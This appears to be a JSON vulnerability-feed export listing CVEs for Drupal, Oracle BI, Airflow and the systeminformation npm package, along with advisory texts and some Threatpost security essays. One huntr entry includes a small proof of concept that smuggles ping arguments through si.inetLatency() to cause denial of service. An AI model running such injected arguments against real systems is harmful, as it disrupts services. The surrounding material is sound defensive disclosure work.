"cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:39:40", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T16:15:00", "type": "cve", "title": "CVE-2020-13671", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-01T18:19:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:33"], "id": "CVE-2020-13671", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13671", "cvss": {"score": 
6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-05T14:43:22", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-21T15:15:00", "type": "cve", "title": "CVE-2020-14864", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2022-07-12T17:42:00", "cpe": 
["cpe:/a:oracle:business_intelligence:12.2.1.3.0", "cpe:/a:oracle:business_intelligence:5.5.0.0.0", "cpe:/a:oracle:business_intelligence:12.2.1.4.0"], "id": "CVE-2020-14864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14864", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*"]}], "veracode": [{"lastseen": "2023-04-18T12:21:41", "description": "apache-airflow is vulnerable to remote code execution (RCE). The vulnerability exists as the example DAGs does not properly sanitize the value of `dag_run.conf[\"message\"]`. The vulnerability exists if examples are enabled when the `load_examples=True` is present in the config.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-20T07:24:23", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": 
"2022-07-13T12:56:56", "id": "VERACODE:25916", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25916/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T16:43:05", "description": "systeminformation is vulnerable to OS command injection. An attacker is able to inject and execute arbitrary OS commands via service parameters that are passed to `si.inetLatency()`, `si.inetChecksite()`, `si.services()`, `si.processLoad()` etc.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-17T03:15:26", "type": "veracode", "title": "OS Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-03-25T21:01:32", "id": "VERACODE:29414", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29414/summary", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T12:21:09", "description": "drupal/core-recommended is vulnerable to Remote Code Execution. 
The attacker is able to inject malicious code through unsanitized filename on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T13:22:25", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-01T19:14:07", "id": "VERACODE:27960", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27960/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T16:28:04", "description": "drupal is vulnerable to remote code execution (RCE). 
The vulnerability exists as it does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T09:24:06", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-01T19:14:07", "id": "VERACODE:27939", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27939/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nodejs": [{"lastseen": "2021-07-28T14:37:03", "description": "## Overview\n\nThe `systeminformation` package is an open source collection of functions to retrieve detailed hardware, system and OS information. 
In affected versions of `systeminformation` there is a command injection vulnerability.\n\nAs a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to `si.inetLatency()`, `si.inetChecksite()`, `si.services()`, `si.processLoad()` ... do only allow strings, reject any arrays. String sanitation works as expected.\n\n## Recommendation\n\nUpgrade to version 5.3.1 or later\n\n## References\n\n- [GitHub Advisory](https://github.com/advisories/GHSA-2m8v-572m-ff2v)\n- [CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21315)", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T03:24:56", "type": "nodejs", "title": "Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-24T03:24:56", "id": "NODEJS:1628", "href": "https://www.npmjs.com/advisories/1628", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "huntr": [{"lastseen": "2023-05-27T15:16:43", "description": "# Description\n\n`systeminformation` is vulnerable to Denial of Service.\n\nIt is possible to overwrite the ping 
command parameters, which results in too long execution.\n\n# Proof of Concept\n\nCreate a .js file with the content below and run it.\n\n```javascript\nconst si = require('systeminformation');\nsi.inetLatency(\"-c 10000000000 -w 999999999 effectrenan.com\").then((a) => { console.log(a) })\n```\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-11T00:00:00", "type": "huntr", "title": "Denial of Service in sebhildebrandt/systeminformation", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-14T10:59:07", "id": "1-NPM-SYSTEMINFORMATION", "href": "https://www.huntr.dev/bounties/1-npm-systeminformation/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-08-30T18:54:52", "description": "If you ask organizations about their top objectives, you will likely hear they need to increase visibility, reduce toolsets and adopt automation to counteract the cybersecurity skills gap. 
And what most don\u2019t realize is that these initiatives are driven by hurdles the industry has created for itself.\n\nCountless hours are spent trying to overcome hurdles in a process that doesn\u2019t get us any closer to thwarting threat actors. Consolidating tools, for example, is just a preservation tactic \u2014 therein lies the problem. So, how can security professionals stop using Band-Aids and reevaluate what\u2019s really going on and how to defend against threats?\n\n## **Understand the Race, Focus on the Finish Line**\n\nThe _race_ we\u2019re running is to develop cyber-defenses that prevent harmful impacts from attacks. The severity of those impacts differs wildly \u2014 from disrupted customer service to reputational damage from stolen data, and multifaceted extortion to regulatory fines. Thus, security teams often place focus on the race itself and forget about the actual goal or _finish line_.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThis is often shown when looking at a security function\u2019s mission statement, which typically highlights the lack of \u201cso what?\u201d and connection to the business. For example: \u201cOur mission is to continuously improve the organization\u2019s security posture by preventing, detecting, analyzing and responding to cybersecurity incidents.\u201d It is missing the finish line.\n\nThe _finish line_ is the business\u2019 ability to continue to operate in the face of threats.\n\n## **Increasing Visibility Is Not the Starting Line**\n\nWhen I speak with security leaders, most say that visibility is the starting line for the success of their program. It is not. Increased visibility is needed because poorly configured systems and poor network hygiene require collection of massive amounts of data for threat monitoring. 
Yes, visibility is vitally important to enable threat monitoring; however, collecting a trove of data is not going to solve problems and will add to them if not part of a larger plan.\n\nVisibility does not drive action. It can enable execution, but it is not the trigger.\n\n## **Intelligence is the Starting Line, and the Power Behind the Racer**\n\nThreat intelligence provides critical information on the cyber-landscape and active adversaries that shape threat profiles and unveil vulnerabilities in an organization, along with the likelihood of compromise and its potential impact to the business.\n\nUnfortunately, organizations don\u2019t know what to do with threat intelligence once they have it. It\u2019s seen as another feed into a SIEM that provides CVE information. Intelligence must be operationalized throughout cyber-defense operations to drive action and inform decision-making.\n\nThe orchestration of how this is done is driven by a command-and-control (C2) function to ensure communication is flowing properly to increase effectiveness of cyber defenses and reduce duplicate efforts.\n\nC2 functions can activate intelligence by:\n\n * Triggering hunt activities. A hunt team should use information about active APT groups and the latest relevant breaches to **identify active or past compromise**.\n * Prioritizing vulnerabilities based on the likelihood and impact of compromise. IT and Security groups use this to **inform patch and upgrade priorities**.\n * Informing security engineering teams what types of monitoring need to be in place to **alert on activities tied to active APT groups** (not just CVEs).\n * Prompting security operations groups to **refresh playbooks to handle updated alerts**.\n * Providing context around breaches so that incident responders can **rapidly contain a breach and prevent repeat compromise**.\n\nIntelligence is used to drive all actions of cyber-defense. 
With proper intelligence, organizations can: (1) understand what actions need to be taken, (2) identify the level of visibility needed, and (3) then determine what tools are needed to fully operationalize this intelligence.\n\n## **Fight the Desire to Start with Tooling**\n\nThere is a deep-rooted force within the cybersecurity industry to buy shiny new tools that promise to solve all problems. Tool-buying fads have come and gone (remember when [HIDS and WIDS](<https://www.neovera.com/hids-nids-wids/>) were a thing?) Believing that shiny new tools are going to be the silver bullet against attackers is like thinking new shoes will win the race for you. Tools don\u2019t provide value unless properly activated and coordinated with other cyber-defense functions.\n\n## **Don\u2019t Forget About the Racer**\n\nNow that we understand the race, we have new shoes, are standing at the starting line and know where to find the finish line, now we can activate the racer. Okay, maybe this metaphor has been taken a little too far \u2014 but in the spirit of breaking things down to build them back up, let\u2019s not forget about the fitness of the racer: The architectures, the tools and the users that make up organizations. This means exercising good hygiene, implementing resilient architectures and practicing secure coding practices.\n\n## **So What?**\n\nOrganizational planning for security often focuses on hurdles created by the industry, not the harmful threat actors in play. There are many disparate technologies that put immense effort towards consolidating tools \u2014 effort that should be spent fighting threats. 
The root of the security skills gap hurdle is not due to untrained experts on the frontlines, but because the industry has aged in a way that requires people to solve problems, which is unscalable.\n\nWhatever hurdles the industry faces (and creates for itself), knowing where the starting line is, focusing on the finish line and using threat intelligence as the power behind the runner provides the best chance of winning the race.\n\n**_Kerry Matre is senior director at Mandiant._**\n\n_**Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T20:16:34", "type": "threatpost", "title": "Winning the Cyber-Defense Race: Understand the Finish Line", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-27T20:16:34", "id": "THREATPOST:B5F8CA0AF4F98DBE9E38860BC10035DE", "href": "https://threatpost.com/winning-cyber-defense-race/168996/", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:56:21", "description": "The [CVE database](<https://www.cvedetails.com/vulnerabilities-by-types.php>) reported 18,325 vulnerabilities in 2020. To add to this, more than 40% of the vulnerabilities do not even have a CVE identifier assigned, and open vulnerabilities on organizations\u2019 infrastructure are the most widely exploited pain points for malicious attacks \u2013 including ransomware. The irony is that many organizations rely on periodic vulnerability assessment activities, like performing scans bi-weekly, monthly, or quarterly, but following this process can take months to complete, ultimately leaving a massive gap for attackers to exploit. This is an example of routine (but random) methodologies and processes invented to keep vulnerabilities in check, but will not protect IT networks. It is essential to assess key areas, identify necessary components, and build a robust and automated vulnerability management program to safeguard your network from the growing attack surface. To do that, below are some best practices to implement into your IT strategy for a robust vulnerability management program.\n\n## **A unified approach to both network and endpoint vulnerabilities**\n\nA vulnerability is classified as any loophole in your network that is exploitable. Modern attackers explore multiple angles to achieve their attack objectives, whether that\u2019s a nation-state actor looking to disrupt critical infrastructure or a cybergang looking to make a quick few million dollars. Focusing on one area and neglecting the other will easily create security gaps.\n\nFor example, traditional vulnerability management programs focus on remote scanning only and ignore vulnerabilities in the endpoints. 
With the changing work norms ushered in by the pandemic, endpoints have become an easy exploit target, and your vulnerability management program should give equal importance to managing both network and endpoint vulnerabilities. Many CISOs ignore software vulnerabilities considering them less critical to their security, but this opens gateways for attackers to intrude the network. Your vulnerability management program must manage vulnerabilities across all IP-enabled devices in your IT infrastructure.\n\n## **Continuous, ongoing and automated vulnerability assessment schedules**\n\nEvery day, numerous vulnerabilities are disclosed, and taking a periodic vulnerability assessment approach will not help you identify the most recent risks \u2013 it will actually keep you several steps behind in building security resilience. With the speed at which attackers can penetrate networks, a tiny gap is enough to execute an attack, and your vulnerability management process should be continuous and ongoing to avoid any unforeseen security risks. Opting for a solution that automates the vulnerability management routine will simplify the process and increase effectiveness.\n\n## **Speed and efficiency of vulnerability scanners**\n\nVulnerability scanning is the foremost step in your vulnerability management process. Slow vulnerability scanners create a lag, slow business processes, and act as a major pitfall for any vulnerability management program. These scanners hinder IT security teams from running continuous scans. Along with this, the vast number of false positives provided by vulnerability scanners makes the entire process even more ineffective. The vulnerability scanner you choose should be rapid, efficient, compatible with your network infrastructure, and provide close to zero false positives.\n\n## **Breadth and comprehensiveness of a vulnerability database**\n\nPerforming vulnerability scanning based on CVE data alone is inaccurate and leads to false reporting. 
Vulnerability scanners must rely on a comprehensive database or a repository of security checks that perform a deep analysis on each vulnerability. As a result, vulnerability databases play a vital role in the vulnerability management program, and the quality of the vulnerability database determines the accuracy of your vulnerability assessment data. Consider using a comprehensive vulnerability database with coverage to both network and endpoint vulnerabilities and is regularly updated to identify the most recent vulnerability in your network.\n\n## **Risk-based vulnerability analysis**\n\nTaking remediation efforts randomly without understanding the risks possessed by each vulnerability is not an intelligent approach to risk-based vulnerability analysis. Every IT infrastructure is unique and has varying risk levels based on access to the network, security tokens, and other elements. Your vulnerability assessment should focus on analyzing risk levels of all vulnerabilities and remediate the most critical ones first. Risk levels are calculated by considering various factors like threat intelligence, public ratings of vulnerabilities, assets in the enterprise, current exploit activities, and many more organization-specific factors.\n\nAdditionally, a vulnerability assessment program should also meet the compliance standards set by regulatory agencies like HIPAA, PCI, NIST, and others.\n\n## **Vulnerability assessment must go beyond assessing only known vulnerabilities**\n\nYour security exposure analysis should go beyond assessing only known vulnerabilities. Crucial activities like misconfiguration assessment, asset exposure analysis, and monitoring security control deviations must be a part of your IT security checklist.\n\n## **Integrated patch remediation**\n\nThe most crucial step followed by vulnerability assessment is to remediate detected vulnerabilities. 
According to a recent [study](<https://securityboulevard.com/2019/10/60-of-breaches-in-2019-involved-unpatched-vulnerabilities/>), 60% of breaches involve vulnerabilities for which a patch was available but not applied on time. Patching helps security teams reduce the attack surface significantly and helps prevent attacks. Your vulnerability management program should be equipped with an integrated patch management tool to remediate vulnerabilities on time, and the patching process safeguards networks from an array of potential attacks.\n\n## **Extensive report catalog**\n\nTracking and monitoring the actions of your vulnerability management process will help you analyze what steps you need to take to adjust your IT security strategy. Insightful reports will help you review and evaluate your vulnerability management process and provide the necessary details of vulnerabilities in your network. Your vulnerability management program should offer an extensive range of reports for detailed study and analysis.\n\nKeeping in mind these key factors will help you evaluate your current vulnerability management program and guide you in making the necessary enhancements to your existing IT strategy. 
By implementing a robust, resilient, expansive, and automated vulnerability management program, you\u2019ll mitigate cyberattacks through minimizing vulnerability risk, ultimately protecting your company\u2019s and customers\u2019 information \u2013 and your reputation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T13:00:36", "type": "threatpost", "title": "Top Strategies That Define the Success of a Modern Vulnerability Management Program", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-27T13:00:36", "id": "THREATPOST:DC1D0F0CCC185180A765DA70CBE07A9B", "href": "https://threatpost.com/top-strategies-that-define-the-success-of-a-modern-vulnerability-management-program/168604/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:56:02", "description": "On Thursday, a 21-year-old US citizen claiming to be the attacker who stole data on more than 50 million T-Mobile customers called the telecom\u2019s security \u201cawful.\u201d\n\nOn Friday, a \u201chumbled\u201d T-Mobile CEO Mike Sievert wiped the egg from his face 
and [apologized](<https://www.t-mobile.com/news/network/cyberattack-against-tmobile-and-our-customers>) for the debacle, the repercussions of which have affected a total of more than 50 million customers at this point. As of Aug. 18, T-Mobile had estimated the total number of ripped-off records to be [~40 million](<https://threatpost.com/t-mobile-40-million-customers-data-stolen/168778/>): a number that [rose to ~50 million](<https://www.t-mobile.com/news/network/additional-information-regarding-2021-cyberattack-investigation>) on Aug. 20 and could double if the purported thief is true to his word.\n\nWhen [the breach](<https://threatpost.com/t-mobile-investigates-100m-records/168689/>) was widely reported 11 days ago, the purported thief was offering to sell 30 million records for ~1 penny each on an underground forum: what he claimed was a subset of 100 million customer records. He alleged that he was going to sell the other 50 million privately. As of Thursday, he hadn\u2019t acknowledged having sold any of the records.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe [Wall Street Journal](<https://www.wsj.com/articles/t-mobile-hacker-who-stole-data-on-50-million-customers-their-security-is-awful-11629985105?mod=article_relatedinline>) has been chatting with the purported attacker via Telegram for a while. The news 